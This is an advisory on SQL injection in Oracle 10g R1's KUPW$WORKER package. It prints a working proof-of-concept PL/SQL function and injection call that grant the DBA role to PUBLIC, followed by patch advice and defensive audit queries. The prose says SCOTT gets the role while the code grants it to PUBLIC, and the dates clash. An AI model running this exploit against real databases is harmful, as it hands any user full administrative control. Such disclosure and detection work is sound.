SQL Injection via Oracle KUPW$WORKER in Oracle 10g R1
Name: SQL Injection via Oracle KUPW$WORKER in Oracle 10g R1
Systems Affected: Oracle 10g R1
Severity: High Risk
Category: SQL Injection
Credit: Alexander Kornbrust
Date: 17 Nov 2006 (V 1.00)
Details
The following proof-of-concept exploit code injects a custom PL/SQL function. This function is executed in the SYS context and grants the DBA permission to the user SCOTT.
Example
-- Create a function first and inject this function. The function will be executed as user SYS.
CREATE OR REPLACE FUNCTION F return number
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO PUBLIC';
COMMIT;
RETURN 1;
END;
/
-- Inject the function in the vulnerable procedure
exec sys.kupw$WORKER.main('x','YY'' and 1=d.f -- r6');
Patch Information
Apply the patches mentioned in Oracle Critical Patch Update July 2006.
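To check whether a database shows the effect of the proof of concept above, a DBA can run the following audit queries. This is an added example, not part of the original advisory; the schema exclusion list in the third query is an assumption and should be adapted to the local installation.

```sql
-- Added example (not from the advisory): audit queries, run as a DBA.

-- 1. Who holds the DBA role? After the PoC above runs, PUBLIC would be
--    listed here. Any grantee that is not an intended administrator
--    should be investigated and the role revoked from it.
SELECT grantee, admin_option, default_role
  FROM dba_role_privs
 WHERE granted_role = 'DBA'
 ORDER BY grantee;

-- 2. Who may execute the affected package directly? Privileges on a
--    package are listed in DBA_TAB_PRIVS under TABLE_NAME.
SELECT grantee, privilege, grantor
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'KUPW$WORKER'
 ORDER BY grantee;

-- 3. Functions outside the excluded schemas whose source combines an
--    autonomous transaction, dynamic SQL and a GRANT, which is the
--    shape of the injected function F above. The NOT IN list is an
--    assumption; extend it with other trusted schemas as needed.
SELECT s.owner, s.name, s.type
  FROM dba_source s
 WHERE s.owner NOT IN ('SYS', 'SYSTEM')
   AND s.type = 'FUNCTION'
 GROUP BY s.owner, s.name, s.type
HAVING MAX(CASE WHEN UPPER(s.text) LIKE '%AUTONOMOUS_TRANSACTION%'
                THEN 1 ELSE 0 END) = 1
   AND MAX(CASE WHEN UPPER(s.text) LIKE '%EXECUTE IMMEDIATE%'
                THEN 1 ELSE 0 END) = 1
   AND MAX(CASE WHEN UPPER(s.text) LIKE '%GRANT %'
                THEN 1 ELSE 0 END) = 1
 ORDER BY s.owner, s.name;
```

A function matching query 3 may have been dropped after use, so an empty result there does not rule out an earlier grant; query 1 shows the state that persists.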
© 2005 by Red-Database-Security GmbH - last update 17-nov-2005
Definition Exploit
Exploit is a common term in computer security for a piece of software that takes advantage of a bug or vulnerability, leading to privilege escalation or denial of service (DoS) on a computer system.
Computer security experts use exploit code to test whether a patch is working properly.